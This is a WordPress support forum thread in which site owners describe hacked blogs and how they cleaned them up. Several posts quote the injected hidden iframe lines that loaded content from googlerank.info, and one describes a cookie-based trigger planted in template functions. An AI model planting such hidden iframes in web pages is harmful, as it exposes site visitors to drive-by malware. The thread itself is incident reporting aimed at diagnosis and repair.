2.2.2 hacked

  • Hi all,

    I’ve been on 2.2.2 for a while, and thought it was free of exploits.

    However, my site (https://marknelson.us) was hacked sometime in the past few weeks.

    Details:

    The get_header() and get_footer() functions in general_template.php were modifed. get_header() created a cookie called “yahg”, and get_footer() looked for it. If it found it, it sucked in some code from googlerank.info. The actual line it inserted was hidden by being base64 encoded, but it showed up on the site looking like this:

    <iframe src=<https://googlerank.info/counter&gt; style=display:none>

    So, my question is this: how did this happen? I don’t have any admins except me on the site. Has anyone else seen this particular hack? Is there a known exploit I should be looking for?

    Yes, I’ll upgrade to 2.3, but it’s only been out a few weeks, and as far as security goes, I usually feel safer with an older version that has been hardened than a .0 version.

    Any suggestions that can be offered would be helpful.

    I’ve looked through the forums, and most of the messages where someone says their site has been hacked seem a little incoherent. A lot of times it looks like that might not even be what happened.

    In this case it seems pretty obvious that it IS what happened. A diff of all the source code with the source I got from wordpress shows just that one file modified.

Viewing 7 replies - 1 through 7 (of 7 total)

  • Your version is definitely vulnerable. There WAS a security upgrade 2.2.3 even before 2.3!
    https://www.ads-software.com/development/2007/09/wordpress-223/

    So, upgrade.

    Thread Starter snorkelman

    (@snorkelman)

    Thanks Moshu… That must have come out shortly after I upgraded… man it’s hard to keep up sometimes.

    I think I’ll apply that upgrade before jumping to 2.3.

    – Mark

    verneho

    (@verneho)

    I wanted to resurface this thread because I just discovered the exact same problem today on my site that runs 2.3.3.

    I was getting messages from people telling me that my site (creativebriefing.com) was crashing their browsers. One person even told me that their anti-virus picked up on something from my site.

    I checked out the source code of my site to see if there was anything unusual. At the very bottom, right before the </body> tag was the following:

    <iframe src=https://googlerank.info width=1 height=1 style=display:none></iframe>

    To fix this, I re-uploaded my theme’s footer.php file, and reloaded the page. The above line of code was gone.

    I then logged into my dashboard, and to be safe, checked the source code again (I remember my dashboard mysteriously crashing a few times last week). To my surprise, the same line of code appeared at the bottom of the source. To fix this, I re-uploaded admin-footer.php into my /wp-admin/ directory.

    I checked the CHMOD for the directory and the files, and they were both set to 644, which means they weren’t writeable.

    Furthermore, I updated my theme after I had updated to 2.3.3, which means that the ‘hack’ definitely happened in the last 2 weeks or so (and wasn’t just left over from 2.2.2).

    Most people probably have had this happen to their site but have no idea (my site worked fine for me about 99.9% of the time). I encourage you to take a look to make sure it hasn’t already happened.

    Now the question is, how did it happen? It doesn’t seem like the get_footer() function was comprimised as suggested above, since re-uploading the theme’s footer.php file takes care of the unwanted code. However, the idea of get_header() creating a cookie to pass on to get_footer() is a bit scary.

    If anybody can shed some light and experience on this, that would be great.

    Thanks,

    Verne

    whooami

    (@whooami)

    I saw that last night on a site I was fixing validation errors on. It was a 2.3.3 site.. could it have been there all along? yes, the owner doesnt have much of an idea whats going on on her site.

    That said, it might be new too.

    maybe I should check back later tonight and see if its come back. I will do that.

    verneho

    (@verneho)

    I got rid of it in the afternoon and checking now, it’s still gone. I’ll post an update if I see it come back.

    I have found this issue on 2.3.3 site I have. I did a complete reinstall of WP and switched folders to the clean site. The issue went. I come back today and it is back. What is causing this?! How did you other guys actually fix it?

    I found that there was an extra line added to my current template file in the index.php file of that template set. I discovered this by installing the default template and the hack/iframe was gone. This told me that there must be something in my other template, so after going through each file I came across this one line – which is now gone. I’ll wait to see if this happens again – fingers crossed.

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘2.2.2 hacked’ is closed to new replies.